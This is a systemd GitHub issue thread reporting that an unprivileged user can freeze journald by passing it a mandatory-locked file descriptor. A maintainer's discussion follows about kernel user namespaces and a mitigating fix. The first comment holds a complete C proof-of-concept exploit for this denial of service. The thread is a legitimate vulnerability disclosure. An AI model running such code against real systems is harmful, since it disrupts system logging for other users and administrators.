### ISSUE TITLE
journal: be stricter when accepting fds passed in, refuse non-tmpfs/non-memfd fs, as well as fds from fs with MS_MAND set, and open the fds with O_NONBLOCK

### ISSUE THREAD

**Issue by xilun** [systemd/systemd#1822]

**Comment by xilun** [comment]
On default installs of at least Ubuntu 15.10, both server and desktop, Fedora 23 and OpenSUSE 42.1, an unprivileged user can freeze journald using the program below. (Journald is then eventually killed and restarted by systemd after a 1 min timeout is detected - but nothing prevent the unprivileged user to DOS in a loop if he feels so inclined.)

The reason is that journald uses inappropriate rules to decide if a file descriptor sent by a user is safe to read.

[ IMO that such a "feature" (passing messages to log to journald by fd to regular files) exists at all should be questioned anyway, given the kind of impacts it can have on various aspects of the whole system (e.g.: the fd is completely read in a malloc'ed area, up to 750 MB) ]

Ubuntu bug: https://bugs.launchpad.net/ubuntu/+source/systemd/+bug/1514141
Fedora bug: https://bugzilla.redhat.com/show_bug.cgi?id=1279251
OpenSUSE bug: https://bugzilla.opensuse.org/show_bug.cgi?id=954374

```
#define _GNU_SOURCE

#include <sched.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/mount.h>
#include <unistd.h>
#include <fcntl.h>
#include <assert.h>
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>

int send_one_fd(int transport_fd, int fd)
{
    struct sockaddr_un sa = {
        .sun_family = AF_UNIX,
        .sun_path = "/run/systemd/journal/socket",
    };
    union {
        struct cmsghdr cmsghdr;
        uint8_t buf[CMSG_SPACE(sizeof(int))];
    } control = {};
    struct msghdr mh = {
        .msg_name = &sa,
        .msg_namelen = offsetof(struct sockaddr_un, sun_path) + strlen(sa.sun_path),
        .msg_control = &control,
        .msg_controllen = sizeof(control),
    };
    struct cmsghdr *cmsg;

    assert(transport_fd >= 0);
    assert(fd >= 0);

    cmsg = CMSG_FIRSTHDR(&mh);
    cmsg->cmsg_level = SOL_SOCKET;
    cmsg->cmsg_type = SCM_RIGHTS;
    cmsg->cmsg_len = CMSG_LEN(sizeof(int));
    memcpy(CMSG_DATA(cmsg), &fd, sizeof(int));

    mh.msg_controllen = CMSG_SPACE(sizeof(int));
    if (sendmsg(transport_fd, &mh, MSG_NOSIGNAL) < 0)
        return -errno;

    return 0;
}

int main(void)
{
    int r;
    unshare(CLONE_NEWNS | CLONE_NEWUSER);
    mount("tmpfs", "/tmp", "tmpfs", MS_MANDLOCK, NULL);
    int fd = open("/tmp/plop", O_CREAT | O_RDWR | O_TRUNC, 02600);
    r = write(fd, &fd, sizeof (fd)); (void)r;
    lseek(fd, 0, SEEK_SET);
    r = lockf(fd, F_LOCK, 0); (void)r;
    int sock_jd = socket(AF_UNIX, SOCK_DGRAM, 0);
    send_one_fd(sock_jd, fd);
    while (1) sleep(15);
}
```

**Comment by poettering** [comment]
How is that an issue in systemd? Looks more like yet another security problem related to unprivileged CLONE_NEWUSER. Mandatory locking is problematic, as it allows deadlocking apps that don't expect it, but that's documented and well-known, and people who turn this on for a file system should really be aware of the problems around it.

Ideally we'd insist on receiving only memfds, and refuse everything else, but memfds are newer than the journal, hence this was not part of the original design.

Sure, we can add some extra checks, for example start refusing everything that is neither a tmpfs, nor a memfd, and use O_NONBLOCK to access the file (which allows bypassing mandatory locks), but really, the bug is in CLONE_NEWUSER here, and allowing that unpriviliged, and not in systemd. It's not that unprivileged CLONE_NEWUSER wasn't known is a massive source of security problems, this is just one among many.

**Comment by poettering** [comment]
Anyway, please file a bug in kernel bugzilla, making the kernel devs aware that CLONE_NEWUSER opens up this vulnerability, so that they deal with it.

Other than that, I'll now make this an RFE bug, so that we become more strict with what we accept too, but honestly, it's really the kernel that needs to fix this properly.

**Comment by xilun** [comment]
So what would you advice exactly to change in the kernel (or anywhere else) ? Do you think it would be interesting to be more secure about this class of problems by making /proc/self/fd/<n> symlinks aware of fd crossing fs namespace boundaries ? Do you know if /proc/self/fd/<n> was intented for security checks in the first time ? Any other idea ?
What for the affected distributions ? Should they disable CLONE_NEWUSER in the meantime, or would the supplementary RFE you propose be enough ?

**Comment by poettering** [comment]
Well, unprivileged CLONE_NEWUSER is something that should really be turned off I think in any distro that cares about security, it alone is the source of a good chunk of the most recent CVEs of the Linux kernel. Well, /proc/self/fd is used for many purposes, and much of it is security sensitive (consider: fanotify() relies on it as the way to query the path of files that change, and it's primary design purpose was antivirus software, i.e. security software). Not sure what it originally was designed for but it's really a _fact_ that that's what it is used for. Journal is just one consumer of this among many.

I am not sure how the kernel folks can fix this issue properly. I hope the CLONE_NEWUSER folks have an idea...

**Comment by xilun** [comment]
Ok I'll ping them.
Thanks!

**Comment by poettering** [comment]
There's a "fix" now in #1837, which makes sure mandatory locking cannot affect journald.

Again, the right place to fix this is in the kernel, but it doesn't hurt if we add some extra checks here.

I decided not to check for tmpfs/memfd explicitly, since we support non-tmpfs-/tmp systems, and as we made the journal proto semi-public need to deal with fds coming from that.

Anyway, as soon as the PR is merged the issue is closed from my perspective.
